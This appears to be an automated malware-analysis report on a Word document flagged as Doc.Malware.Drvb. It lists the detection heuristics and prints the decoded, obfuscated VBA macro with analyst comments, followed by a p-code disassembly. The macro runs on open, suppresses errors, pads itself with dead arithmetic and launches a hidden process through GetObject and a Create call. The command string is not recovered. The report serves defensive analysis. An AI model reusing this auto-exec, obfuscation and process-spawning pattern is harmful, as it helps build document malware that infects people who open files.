MALICIOUS
Risk Score: 190
Heuristics: 7
-
ClamAV: Doc.Malware.Drvb-6902289-0 | critical | CLAMAV_DETECTION — ClamAV detected this file as malware: Doc.Malware.Drvb-6902289-0
-
VBA macros detected | medium | 3 related findings | OLE_VBA_MACROS — Document contains VBA macro code
-
GetObject call | high | OLE_VBA_GETOBJ — GetObject call. Matched line in script:
    Set TXABkB = GetObject(WZA_U1B.wAAXcA)
-
VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC — Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro | low | OLE_VBA_AUTOOPEN — AutoOpen macro. Matched line in script:
    Sub autoopen()
-
Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC — OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL | info | EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL: http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body). This is the standard OOXML DrawingML schema namespace that ordinary Office documents contain; on its own it is not an indicator of compromise.
Extracted artifacts: 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11466 bytes |

SHA-256: ee15022a278636ce438a6cc6779463dd9a9a7e53d7927ec5f678c4784f0b1b6a
Preview script — first 1,000 lines of the extracted script
' Three VBA module streams, concatenated by the extractor in the order the
' appended p-code dump lists them (rXDoUA1D, WZA_U1B, wAAcAZ). Each
' `Attribute VB_Name` line begins a new module; only the third one carries
' procedure code in this listing.
' VB_Base "1Normal.ThisDocument" is the base of a Word document's
' ThisDocument class module.
Attribute VB_Name = "rXDoUA1D"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' A GUID-pair VB_Base is what designer (UserForm) modules carry.
' NOTE(review): the autoopen procedure below reads WZA_U1B.wAAXcA,
' WZA_U1B.nAAA_x and several other WZA_U1B members, and the p-code name
' table has `MSForms` adjacent to this module's name — presumably the
' strings handed to GetObject/Create live in this form's control or property
' values, which are not part of the extracted source. Confirm against the
' form's storage stream before drawing conclusions about the target object.
Attribute VB_Name = "WZA_U1B"
Attribute VB_Base = "0{75E9A92E-ECF1-4CCF-AF6C-5F39DBCAA415}{5478F83B-268A-4049-9EB6-E3BE4B2695D1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Module holding the auto-exec procedure. The p-code dump's Line #0 prints
' `FuncDefn (Sub wAAcAZ())` where the source reads `Sub autoopen()` — the
' module name instead of the procedure name — which looks like a name-table
' offset in the disassembly; treat the decoded source names as primary.
Attribute VB_Name = "wAAcAZ"
' Auto-executing entry point: Word runs a Sub named autoopen when the
' document opens (this is what the OLE_VBA_AUTOOPEN finding matched).
' Analyst annotations only; the code lines are unchanged.
'
' Structure: ten `If a = b Then x = <arithmetic> End If` blocks, interleaved
' with the three statements that do real work (the Set of TXABkB, the
' ShowWindow assignment, and the .Create% call). In each If block the two
' compared names and the assigned name occur exactly once in the visible
' source and are never read again, so the blocks have no effect on the
' working statements — they look like padding meant to defeat signature and
' heuristic matching (inferred from their dead results, not proven).
'
' NOTE(review): the p-code dump appended below does not print the same
' identifiers at the same positions as this source (p-code Line #2 loads
' `autoopen` and `jwQX_AQ` where the source compares `jwQX_AQ` and
' `bQAAUAXQ`; Line #3 stores to `bQAAUAXQ` where the source assigns
' `wBGXc1`). The opcode sequence matches the source statement for statement,
' so this is consistent with a one-entry offset in the disassembler's
' identifier table rather than a different program — confirm before treating
' either name set as authoritative.
Sub autoopen()
' Suppress every runtime error so a failing GetObject or arithmetic line
' neither aborts the macro nor shows an error dialog to the user.
On Error Resume Next
If jwQX_AQ = bQAAUAXQ Then
wBGXc1 = 70048900 - ChrB(470836093 * Round(414266693) + Q11Ux1 - ChrB(wxAAAAAA)) / w11QA1Bc / Rnd(32834712 / VXDQ_X_Q * SpBb / ChrW(666234281 * CBool(678345324) / 441023156 + CStr(skADAoCG))) / 243962631 * Oct(FcQUxAx)
End If
If E4UADQ = ak1QDxA Then
A4AAXUD = 181341305 - ChrB(2559126 * Round(651620675) + WUQAkw - ChrB(ABkA1oGQ)) / nAxkAUo / Rnd(663640487 / QDDk4A * SpBb / ChrW(86560935 * CBool(722992906) / 766325832 + CStr(qBUZ_Z))) / 639759154 * Oct(k1AAAA)
End If
' First working statement. The moniker/string passed to GetObject is a member
' of module WZA_U1B, whose stored values are not in the extracted source, so
' the type of the returned object cannot be read off this listing.
Set TXABkB = GetObject(WZA_U1B.wAAXcA)
If lABABAXA = DAZABX Then
lQ1AAAAZ = 261543561 - ChrB(776236418 * Round(742841960) + SZAQQQU - ChrB(OBZAwQ4Q)) / hAo_4GA / Rnd(859834665 / ZUGABUA * SpBb / ChrW(613997888 * CBool(628780582) / 97799350 + CStr(pCZ_B1Z))) / 286060895 * Oct(VA_XZx1k)
End If
If wkAZQBXG = kQwcAx Then
FAUAAGXA = 692173888 - ChrB(882530444 * Round(261562846) + WwA_Uc - ChrB(WUAABA)) / KBcw_BZ / Rnd(194635374 / oAUA1UZ * SpBb / ChrW(913345409 * CBool(269177192) / 335333058 + CStr(SAADGAA))) / 409932476 * Oct(NAZA1XA4)
End If
If wAZA_o = z1CGAo Then
YwDBkDDo = 565046529 - ChrB(982937593 * Round(827222769) + vADX__ - ChrB(kwA4BUUc)) / P4AADGA / Rnd(908708001 / fAZAGkDA * SpBb / ChrW(569750413 * CBool(465100729) / 963190173 + CStr(tQc4A1))) / 379682012 * Oct(S4QA1A1U)
End If
' Second working statement: 709285 - 709285 = 0, so ShowWindow on the object
' obtained above is set to 0 (the constant is split to avoid a literal 0).
TXABkB.ShowWindow = 709285 - 709285
If HkAQ1A = qQcc4Q Then
wAQA1X = 707896374 - ChrB(949739080 * Round(402376951) + uA1AACoA - ChrB(XZABUAck)) / Co1DDA / Rnd(621640367 / VwUGAQDQ * SpBb / ChrW(104621335 * CBool(720898872) / 57388389 + CStr(QUZAx_))) / 585106962 * Oct(rABAx_wA)
End If
If fQDAGCZ = q1BAAUC Then
cUXDAA_ = 883231790 - ChrB(228047737 * Round(55639862) + ckBA4Aoc - ChrB(vAAAX1)) / nAAC__AA / Rnd(973477493 / pA_DoAX1 * SpBb / ChrW(993290355 * CBool(177148998) / 637207538 + CStr(KAQDDQ))) / 736677806 * Oct(N1UABA)
End If
' Third working statement: a second GetObject on another WZA_U1B value,
' immediately followed by a four-argument `Create%` call (the p-code dump
' shows `ArgsMemCall ... 0x0004`). The first argument is a concatenation of
' three WZA_U1B members and four other names; the object whose ShowWindow
' was just set to 0 is passed as the third argument.
' NOTE(review): four arguments with a startup-information-like object in
' third position and a trailing by-reference name match the shape of a WMI
' Win32_Process.Create(CommandLine, CurrentDirectory,
' ProcessStartupInformation, ProcessId) call, which would fit the
' OLE_VBA_GETOBJ and OLE_VBA_PCODE_AUTOEXEC_EXEC findings — but the moniker
' and the command string live in the form module and are not recoverable
' from this text. If that reading is confirmed, detection rules keyed on
' WINWORD.EXE as the direct parent of the spawned process will not see it;
' correlate WMI-initiated process creation with the Word session instead.
GetObject(WZA_U1B.nAAA_x).Create% EUxQU_A + WZA_U1B.PABZAxAD + AxAAkBAQ + WZA_U1B.V_AAkAZ + vAXAAA_A + WZA_U1B.dAZU_Ao + jQXBAQD, BA4UxAA, TXABkB, IAxA4AA
If ECAU4QA = JAwBDA Then
IX1o1DQA = 437120822 - ChrB(346753572 * Round(246870008) + OUAAGAo - ChrB(UZwAxAU)) / rDGAUA / Rnd(708072242 / JAAXDAoA * SpBb / ChrW(448745315 * CBool(68302440) / 232509212 + CStr(ZCUQQGBA))) / 796841784 * Oct(FA_AQxU4)
End If
If jBUABCZA = zA4UDw4 Then
DxAAD4 = 120193573 - ChrB(246416607 * Round(456916623) + R_A1oZCA - ChrB(uoDGAA_)) / Zo4A1oox / Rnd(350564299 / jxkDAQx * SpBb / ChrW(282469471 * CBool(826474509) / 879884602 + CStr(BCXAUAXU))) / 653008359 * Oct(hxAQ4Ax)
End If
If ix1GoDA = no1BADQ1 Then
PwQBoCA = 803746356 - ChrB(302626175 * Round(972335703) + SAAocZAQ - ChrB(oCAAAUx)) / nBAADk / Rnd(146735218 / l1AAGoZC * SpBb / ChrW(812377195 * CBool(386771033) / 99860431 + CStr(GBG_BGA))) / 318334200 * Oct(AoAAABGA)
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/f88ed73b9ed34013915ce465a9d5b993.bin
' ===============================================================================
' Module streams:
' Macros/VBA/rXDoUA1D - 1106 bytes
' Macros/VBA/WZA_U1B - 1158 bytes
' Macros/VBA/wAAcAZ - 5100 bytes
' Line #0:
' FuncDefn (Sub wAAcAZ())
' Line #1:
' OnError (Resume Next)
' Line #2:
' Ld autoopen
' Ld jwQX_AQ
' Eq
' IfBlock
' Line #3:
' LitDI4 0xDC84 0x042C
' LitDI4 0x637D 0x1C10
' LitDI4 0x3545 0x18B1
' ArgsLd Round 0x0001
' Mul
' Ld wBGXc1
' Add
' Ld Q11Ux1
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld wxAAAAAA
' Div
' LitDI4 0x0498 0x01F5
' Ld w11QA1Bc
' Div
' Ld SpBb
' Mul
' LitDI4 0xEDA9 0x27B5
' LitDI4 0xBA6C 0x286E
' Coerce (Bool)
' Mul
' LitDI4 0x7AB4 0x1A49
' Div
' Ld VXDQ_X_Q
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0x9307 0x0E8A
' Div
' Ld skADAoCG
' ArgsLd Oct 0x0001
' Mul
' Sub
' St bQAAUAXQ
' Line #4:
' EndIfBlock
' Line #5:
' Ld FcQUxAx
' Ld E4UADQ
' Eq
' IfBlock
' Line #6:
' LitDI4 0x0C79 0x0ACF
' LitDI4 0x0C96 0x0027
' LitDI4 0xF143 0x26D6
' ArgsLd Round 0x0001
' Mul
' Ld A4AAXUD
' Add
' Ld WUQAkw
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld ABkA1oGQ
' Div
' LitDI4 0x59A7 0x278E
' Ld nAxkAUo
' Div
' Ld SpBb
' Mul
' LitDI4 0xD0A7 0x0528
' LitDI4 0xFF0A 0x2B17
' Coerce (Bool)
' Mul
' LitDI4 0x3448 0x2DAD
' Div
' Ld QDDk4A
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0xF332 0x2621
' Div
' Ld qBUZ_Z
' ArgsLd Oct 0x0001
' Mul
' Sub
' St ak1QDxA
' Line #7:
' EndIfBlock
' Line #8:
' SetStmt
' Ld MSForms
' MemLd GetObject
' ArgsLd TXABkB 0x0001
' Set k1AAAA
' Line #9:
' Ld wAAXcA
' Ld lABABAXA
' Eq
' IfBlock
' Line #10:
' LitDI4 0xD689 0x0F96
' LitDI4 0x6D82 0x2E44
' LitDI4 0xDE68 0x2C46
' ArgsLd Round 0x0001
' Mul
' Ld lQ1AAAAZ
' Add
' Ld SZAQQQU
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld OBZAwQ4Q
' Div
' LitDI4 0x0929 0x3340
' Ld hAo_4GA
' Div
' Ld SpBb
' Mul
' LitDI4 0xDD40 0x2498
' LitDI4 0x6E26 0x257A
' Coerce (Bool)
' Mul
' LitDI4 0x4CB6 0x05D4
' Div
' Ld ZUGABUA
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0xF15F 0x110C
' Div
' Ld pCZ_B1Z
' ArgsLd Oct 0x0001
' Mul
' Sub
' St DAZABX
' Line #11:
' EndIfBlock
' Line #12:
' Ld VA_XZx1k
' Ld wkAZQBXG
' Eq
' IfBlock
' Line #13:
' LitDI4 0xBC40 0x2941
' LitDI4 0x588C 0x349A
' LitDI4 0x21DE 0x0F97
' ArgsLd Round 0x0001
' Mul
' Ld FAUAAGXA
' Add
' Ld WwA_Uc
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld WUAABA
' Div
' LitDI4 0xE66E 0x0B99
' Ld KBcw_BZ
' Div
' Ld SpBb
' Mul
' LitDI4 0x8B81 0x3670
' LitDI4 0x5168 0x100B
' Coerce (Bool)
' Mul
' LitDI4 0xC6C2 0x13FC
' Div
' Ld oAUA1UZ
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0x12BC 0x186F
' Div
' Ld SAADGAA
' ArgsLd Oct 0x0001
' Mul
' Sub
' St kQwcAx
' Line #14:
' EndIfBlock
' Line #15:
' Ld NAZA1XA4
' Ld wAZA_o
' Eq
' IfBlock
' Line #16:
' LitDI4 0xED01 0x21AD
' LitDI4 0x6FF9 0x3A96
' LitDI4 0x6AF1 0x314E
' ArgsLd Round 0x0001
' Mul
' Ld YwDBkDDo
' Add
' Ld vADX__
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld kwA4BUUc
' Div
' LitDI4 0xC8A1 0x3629
' Ld P4AADGA
' Div
' Ld SpBb
' Mul
' LitDI4 0xB38D 0x21F5
' LitDI4 0xDFB9 0x1BB8
' Coerce (Bool)
' Mul
' LitDI4 0x1D9D 0x3969
' Div
' Ld fAZAGkDA
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0x7CDC 0x16A1
' Div
' Ld tQc4A1
' ArgsLd Oct 0x0001
' Mul
' Sub
' St z1CGAo
' Line #17:
' EndIfBlock
' Line #18:
' LitDI4 0xD2A5 0x000A
' LitDI4 0xD2A5 0x000A
' Sub
' Ld k1AAAA
' MemSt S4QA1A1U
' Line #19:
' Ld ShowWindow
' Ld HkAQ1A
' Eq
' IfBlock
' Line #20:
' LitDI4 0xA436 0x2A31
' LitDI4 0xDE48 0x389B
' LitDI4 0xC8F7 0x17FB
' ArgsLd Round 0x0001
' Mul
' Ld wAQA1X
' Add
' Ld uA1AACoA
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld XZABUAck
' Div
' LitDI4 0x7AAF 0x250D
' Ld Co1DDA
' Div
' Ld SpBb
' Mul
' LitDI4 0x6517 0x063C
' LitDI4 0x0B38 0x2AF8
' Coerce (Bool)
' Mul
' LitDI4 0xAD65 0x036B
' Div
' Ld VwUGAQDQ
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0x0612 0x22E0
' Div
' Ld QUZAx_
' ArgsLd Oct 0x0001
' Mul
' Sub
' St qQcc4Q
' Line #21:
' EndIfBlock
' Line #22:
' Ld rABAx_wA
' Ld fQDAGCZ
' Eq
' IfBlock
' Line #23:
' LitDI4 0x0C2E 0x34A5
' LitDI4 0xBB79 0x0D97
' LitDI4 0xFF36 0x0350
' ArgsLd Round 0x0001
' Mul
' Ld cUXDAA_
' Add
' Ld ckBA4Aoc
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld vAAAX1
' Div
' LitDI4 0x1675 0x3A06
' Ld nAAC__AA
' Div
' Ld SpBb
' Mul
' LitDI4 0x6873 0x3B34
' LitDI4 0x1446 0x0A8F
' Coerce (Bool)
' Mul
' LitDI4 0x03F2 0x25FB
' Div
' Ld pA_DoAX1
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0xCFAE 0x2BE8
' Div
' Ld KAQDDQ
' ArgsLd Oct 0x0001
' Mul
' Sub
' St q1BAAUC
' Line #24:
' EndIfBlock
' Line #25:
' Ld Create
' Ld MSForms
' MemLd EUxQU_A
' Add
' Ld PABZAxAD
' Add
' Ld MSForms
' MemLd AxAAkBAQ
' Add
' Ld V_AAkAZ
' Add
' Ld MSForms
' MemLd vAXAAA_A
' Add
' Ld dAZU_Ao
' Add
' Ld jQXBAQD
' Ld k1AAAA
' Ld BA4UxAA
' Ld MSForms
' MemLd N1UABA
' ArgsLd TXABkB 0x0001
' ArgsMemCall nAAA_x% 0x0004
' Line #26:
' Ld IAxA4AA
' Ld ECAU4QA
' Eq
' IfBlock
' Line #27:
' LitDI4 0xEF36 0x1A0D
' LitDI4 0x0A24 0x14AB
' LitDI4 0xEFF8 0x0EB6
' ArgsLd Round 0x0001
' Mul
' Ld IX1o1DQA
' Add
' Ld OUAAGAo
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld UZwAxAU
' Div
' LitDI4 0x5332 0x2A34
' Ld rDGAUA
' Div
' Ld SpBb
' Mul
' LitDI4 0x4F63 0x1ABF
' LitDI4 0x3668 0x0412
' Coerce (Bool)
' Mul
' LitDI4 0xCF1C 0x0DDB
' Div
' Ld JAAXDAoA
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0xD738 0x2F7E
' Div
' Ld ZCUQQGBA
' ArgsLd Oct 0x0001
' Mul
' Sub
' St JAwBDA
' Line #28:
' EndIfBlock
' Line #29:
' Ld FA_AQxU4
' Ld jBUABCZA
' Eq
' IfBlock
' Line #30:
' LitDI4 0x0225 0x072A
' LitDI4 0x04DF 0x0EB0
' LitDI4 0xFE8F 0x1B3B
' ArgsLd Round 0x0001
' Mul
' Ld DxAAD4
' Add
' Ld R_A1oZCA
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld uoDGAA_
' Div
' LitDI4 0x2FCB 0x14E5
' Ld Zo4A1oox
' Div
' Ld SpBb
' Mul
' LitDI4 0x245F 0x10D6
' LitDI4 0x000D 0x3143
' Coerce (Bool)
' Mul
' LitDI4 0xF93A 0x3471
' Div
' Ld jxkDAQx
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0x1DE7 0x26EC
' Div
' Ld BCXAUAXU
' ArgsLd Oct 0x0001
' Mul
' Sub
' St zA4UDw4
' Line #31:
' EndIfBlock
' Line #32:
' Ld hxAQ4Ax
' Ld ix1GoDA
' Eq
' IfBlock
' Line #33:
' LitDI4 0x3234 0x2FE8
' LitDI4 0xB57F 0x1209
' LitDI4 0xAA57 0x39F4
' ArgsLd Round 0x0001
' Mul
' Ld PwQBoCA
' Add
' Ld SAAocZAQ
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld oCAAAUx
' Div
' LitDI4 0x0072 0x08BF
' Ld nBAADk
' Div
' Ld SpBb
' Mul
' LitDI4 0xE46B 0x306B
' LitDI4 0xA859 0x170D
' Coerce (Bool)
' Mul
' LitDI4 0xBFCF 0x05F3
' Div
' Ld l1AAGoZC
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0x64F8 0x12F9
' Div
' Ld GBG_BGA
' ArgsLd Oct 0x0001
' Mul
' Sub
' St no1BADQ1
' Line #34:
' EndIfBlock
' Line #35:
' EndSub